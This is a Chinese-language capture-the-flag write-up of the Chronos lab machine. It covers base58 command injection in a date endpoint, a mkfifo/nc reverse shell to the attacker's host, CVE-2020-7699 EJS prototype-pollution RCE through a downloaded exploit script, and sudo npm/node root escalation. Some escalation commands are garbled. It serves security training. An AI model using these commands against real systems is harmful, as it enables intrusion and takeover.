0x01 靶机信息
0x02 Write-Up
2.1 主机扫描
靶机IP:192.168.3.22
使用工具TXPortMap(https://github.com/4dogs-cn/TXPortMap)扫描主机
扫描出网站开放了22,80,8000端口,网站采用了apache和Express架构,SSH版本为2.0
data:image/s3,"s3://crabby-images/0cf1a/0cf1aa62a610a5beb3c43344c2dd2254b8b84528" alt="index.png"
2.2 观察网站
访问主页
data:image/s3,"s3://crabby-images/3ec43/3ec433bfff66a22f4e21972966bb14d6941bd724" alt="index-1.png"
访问8000端口,页面显示Date&Time
data:image/s3,"s3://crabby-images/6dd98/6dd988f1a0af0457a20b21ccc38f56f7a1726619" alt="index-2.png"
查看网页元素,其中有一串(/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL)类似路径
data:image/s3,"s3://crabby-images/dc3cf/dc3cfc988c8b937623a987ec4b5b6f228ac97765" alt="index-3.png"
2.2.1 发现OPTIONS请求
利用burp查看具体参数
data:image/s3,"s3://crabby-images/d92e7/d92e7a1dfbbd66e8f3cfeef4ddd255ed9142b33c" alt="index-4.png"
OPTIONS /date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL HTTP/1.1
OPTIONS获取当前URL所支持的方法
Access-Control-Request-Method: GET
请求方法为GET
Access-Control-Request-Headers: user-agent
请求会携带头部字段:user-agent
直接访问路径被拒绝
data:image/s3,"s3://crabby-images/8822f/8822f93736a14ee0c43072dc7679e21b28985ebe" alt="index-5.png"
2.2.2 根据OPTIONS内容调整参数访问
结合OPTIONS的内容,可能是传过去的user-agent不符合要求,重点关注
观察80端口页面,发现一个跨域请求,域名:chronos.local,User-Agent:Chronos
data:image/s3,"s3://crabby-images/ac172/ac172c9c99b4b2ca91d61baa6b732a03b45f99ea" alt="index-6.png"
添加解析到hosts文件
data:image/s3,"s3://crabby-images/6367b/6367b5f335d0b392c40bc576ec7b949722e6c646" alt="index-7.png"
重新访问(http://chronos.local),主页出现了日期和时间,说明之前的请求成功了
data:image/s3,"s3://crabby-images/d846e/d846e76fa3a32c8f5d7375439e57c45044ada20d" alt="index-8.png"
在网页流量中可以看到请求成功,User-Agent:Chronos
data:image/s3,"s3://crabby-images/5c44b/5c44be61c9cf8d6793683124350a232ca4be70ce" alt="index-9.png"
在8000端口,直接使用域名访问失败,下一步修改Agent
data:image/s3,"s3://crabby-images/143e5/143e5a394c24b456ae6f393434521923a3f833c9" alt="index-10.png"
data:image/s3,"s3://crabby-images/509b5/509b549c3cb5ea3fe25cf2509219bc67c11f64f1" alt="index-11.png"
data:image/s3,"s3://crabby-images/5ff20/5ff2053e6dfdec72850b2e17ad93dd0e6826be24" alt="index-12.png"
访问成功
data:image/s3,"s3://crabby-images/d0d83/d0d836de14b54ac6f2fa0626524d267eddf53edd" alt="index-13.png"
2.2.3 将date的传参解码
使用(https://www.dcode.fr/cipher-identifier)cipher解码
内容4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL,识别为base58
data:image/s3,"s3://crabby-images/655af/655af0815dc58b54f9679e9857b9be80ab4d7ba6" alt="index-14.png"
同时解码内容为'+Today is %A, %B %d, %Y %H:%M:%S.',是执行date命令的参数
data:image/s3,"s3://crabby-images/2061f/2061f8081c621fc55c44376c3535a9a076f0bb5d" alt="index-15.png"
2.3 利用命令执行反弹shell
2.3.1 测试传参
尝试利用;独立执行新的命令
; ls -l
base58编码后:3ExVpXJqdV
(http://www.metools.info/code/c74.html) MeTools工具
data:image/s3,"s3://crabby-images/9fe6c/9fe6ce0f26ba78e9eccc2f248e929a4e77b9846d" alt="index-18.png"
执行成功,可以看到有个www-data用户
data:image/s3,"s3://crabby-images/508a9/508a90630f7f12d2d62e670f4b7e153df3115534" alt="index-16.png"
2.3.2 反弹shell
在kali中开启监听端口
nc -lvvp 4444
data:image/s3,"s3://crabby-images/91e3b/91e3bd41261cb9866c80ef6189a13e87c8d64ae9" alt="index-17.png"
反弹语句:;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.3.23 4444>/tmp/f
base58 :3rqRK5HNRart7G6euj73LHosixYeKbLr13V6UbRvyosw342VHcRsWoA9phAm8PQmDfWYawXHoYGbmdc56tRJ7bfFu1wgv5vMUHuGC5UG9rF2gHb
data:image/s3,"s3://crabby-images/8e431/8e43104b3710515d0978e98ffee0e4b2bd306243" alt="index-19.png"
反弹成功
data:image/s3,"s3://crabby-images/e9a45/e9a45c049efd97dd15d5f8c325ef03d642adeeaa" alt="index-20.png"
2.3.4 发现chronos-v2目录
在opt目录下发现chronos-v2目录,具有上传功能
data:image/s3,"s3://crabby-images/10ad2/10ad27c86b6327b3bab6861a95a2001e2150ff08" alt="index-21.png"
开在本地8080端口
data:image/s3,"s3://crabby-images/837ae/837ae462b8c0ebd12979afc773f6951885ab3c5d" alt="index-22.png"
2.4 利用NodeJS模块代码注入提权
查找到在express-fileupload": "^1.1.7-alpha.3"中存在NodeJS模块代码注入(CVE-2020-7699),借用一张图表示
由于express-fileupload 具有“parseNested”特征。当“parseNested”选项启用时,它负责将上传的 JSON 数据“扁平化 (flatten)”为嵌入式对象。
如果我们将{“a.b.c”}作为输入,则在内部它将被用作{“a”:{“b”:{“C”:true}}}。
假设你的应用程序正在使用 EJS 解析上传的数据,而没有执行额外的检查,那么攻击者就能够利用'__proto__.outputFunctionName'发送HTTP请求,覆写 EJS 的“outputFunctionName”选项。
data:image/s3,"s3://crabby-images/4da5b/4da5bbd70cbcf41c47db6ad126f50b2c1294d47a" alt="index-23.png"
kali下载利用脚本(https://github.com/boiledsteak/EJS-Exploit)
git clone https://github.com/boiledsteak/EJS-Exploit.git
data:image/s3,"s3://crabby-images/8a607/8a6073c6111879d30ed1168cab49b044fa37f546" alt="index-24.png"
修改脚本内IP和端口
data:image/s3,"s3://crabby-images/df6c1/df6c18802b13d57d1120116b9050be236b25f0c8" alt="index-25.png"
kali 开启http服务传输脚本
python3 -m http.server 80
data:image/s3,"s3://crabby-images/99605/996053c3495226fc8dbb76977f25d2694ef8022f" alt="index-26.png"
同时在另一侧开启5555端口侦听
nc -lvnp 5555
data:image/s3,"s3://crabby-images/9b906/9b9061a442cffb270693bb5d1c2e4479dee6efbb" alt="index-27.png"
目标机下载脚本
wget http://192.168.3.23/EJS-RCE-attack.py
data:image/s3,"s3://crabby-images/d95a0/d95a00b8d74181a14cf2831941f137ecc756c0d5" alt="index-28.png"
利用python3运行脚本
data:image/s3,"s3://crabby-images/5969f/5969fb765bf10a399ee19467195e60f19dd64167" alt="index-29.png"
2.4.1 得到imera用户的flag
获得imera用户权限
data:image/s3,"s3://crabby-images/69424/69424fee2572f0c135f80f63ce9ed7e25fde50f1" alt="index-30.png"
找到user's flag---byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK
data:image/s3,"s3://crabby-images/9f9d9/9f9d9ff567536f763711b971a856a261f4d504aa" alt="index-31.png"
2.5 root提权
sudo -l
查看当前用户拥有的root执行权限
data:image/s3,"s3://crabby-images/bdd31/bdd31b3975c414e1ec440f005aa8ac5d1c545691" alt="index-32.png"
思路一:利用npm提权
npm的利用是失败的,利用https://gtfobins.github.io/gtfobins/npm/的语句
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bindata:image/s3,"s3://crabby-images/610e7/610e76b0f08ca23bed3d1e0c8a33600331c7a2e7" alt="""}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i
data:image/s3,"s3://crabby-images/b73ec/b73ec26517f995b6d282ea70876d59b2407ed695" alt="index-33.png"
思路二:利用node提权
sudo node -e 'require("child process").spaw("/bin/sh", stdio: [0, 1, 2]1)'
data:image/s3,"s3://crabby-images/7cb82/7cb82f13caddf9d98d0e86064ddab17008bb2e52" alt="index-34.png"
提权成功
data:image/s3,"s3://crabby-images/ec811/ec8116adfce479aac1b84a78e2fa653c934d3245" alt="index-35.png"
获得root's flag
data:image/s3,"s3://crabby-images/13645/13645f0d781661c0669789a7775076ad06d423b2" alt="index-36.png"